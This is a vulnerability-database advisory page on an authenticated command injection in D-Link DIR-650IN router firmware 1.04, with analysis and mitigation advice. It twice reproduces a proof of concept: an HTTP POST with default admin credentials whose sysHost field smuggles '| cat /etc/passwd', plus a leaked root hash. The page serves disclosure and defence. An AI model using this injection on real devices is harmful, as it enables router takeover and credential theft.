D-Link DIR-650IN - Authenticated Command Injection
D-Link DIR-650IN - Authenticated Command Injection
AI Analysis
Technical Summary
This vulnerability affects the D-Link DIR-650IN router firmware version 1.04. The Diagnostic feature's sysHost parameter in the web UI does not sanitize input, enabling authenticated users to perform command injection. An attacker can submit commands appended to legitimate ping or traceroute requests, resulting in execution of arbitrary OS commands on the router. This leads to full system compromise, including access to sensitive files. The exploit requires valid credentials but can be performed with low-privilege accounts. No CVE identifier was initially assigned, but the issue is documented with public exploit code. There is no indication of an official patch or remediation from the vendor at this time.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary operating system commands on the router, leading to full compromise. This includes reading sensitive system files such as /etc/passwd, potentially exposing user credentials and system information. The router's integrity and confidentiality are severely impacted, which could facilitate further network attacks or persistent control over the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the router's web interface to trusted users only and use strong authentication credentials. Monitor for unauthorized access attempts. Avoid exposing the router management interface to untrusted networks. Consider network segmentation to limit attacker reach if compromise occurs.
Indicators of Compromise
- exploit-code: # Exploit Title: D-Link DIR-650IN - Authenticated Command Injection # Date: 2023-01-08 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 # Version: Firmware V1.04 (REQUIRED) # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108 # CVE: N/A (Version included now, previously missing) Description: The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality. The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd. Steps to Reproduce: 1. Log in to the router web interface. 2. Go to Management → Diagnostic. 3. Select Ping or Traceroute. 4. Enter: google.com | cat /etc/passwd 5. Click Apply. 6. Output includes /etc/passwd contents. HTTP PoC: POST /boafrm/formSysCmd HTTP/1.1 Host: 192.168.0.1 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply Response Extract: root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/:/dev/null References: https://www.dlink.com https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
D-Link DIR-650IN - Authenticated Command Injection
Description
D-Link DIR-650IN - Authenticated Command Injection
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability affects the D-Link DIR-650IN router firmware version 1.04. The Diagnostic feature's sysHost parameter in the web UI does not sanitize input, enabling authenticated users to perform command injection. An attacker can submit commands appended to legitimate ping or traceroute requests, resulting in execution of arbitrary OS commands on the router. This leads to full system compromise, including access to sensitive files. The exploit requires valid credentials but can be performed with low-privilege accounts. No CVE identifier was initially assigned, but the issue is documented with public exploit code. There is no indication of an official patch or remediation from the vendor at this time.
Potential Impact
Successful exploitation allows an authenticated attacker to execute arbitrary operating system commands on the router, leading to full compromise. This includes reading sensitive system files such as /etc/passwd, potentially exposing user credentials and system information. The router's integrity and confidentiality are severely impacted, which could facilitate further network attacks or persistent control over the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the router's web interface to trusted users only and use strong authentication credentials. Monitor for unauthorized access attempts. Avoid exposing the router management interface to untrusted networks. Consider network segmentation to limit attacker reach if compromise occurs.
Technical Details
- Edb Id
- 52508
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for D-Link DIR-650IN - Authenticated Command Injection
# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection # Date: 2023-01-08 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 # Version: Firmware V1.04 (REQUIRED) # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108 # CVE: N/A (Version included now, previously missing) Description: The D-Link DIR-650IN Wireless N300 Router is vulnerable to an... (1037 more characters)
Threat ID: 69da14bc1cc7ad14da6c87c3
Added to database: 4/11/2026, 9:30:36 AM
Last enriched: 4/11/2026, 9:30:46 AM
Last updated: 4/11/2026, 3:36:52 PM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.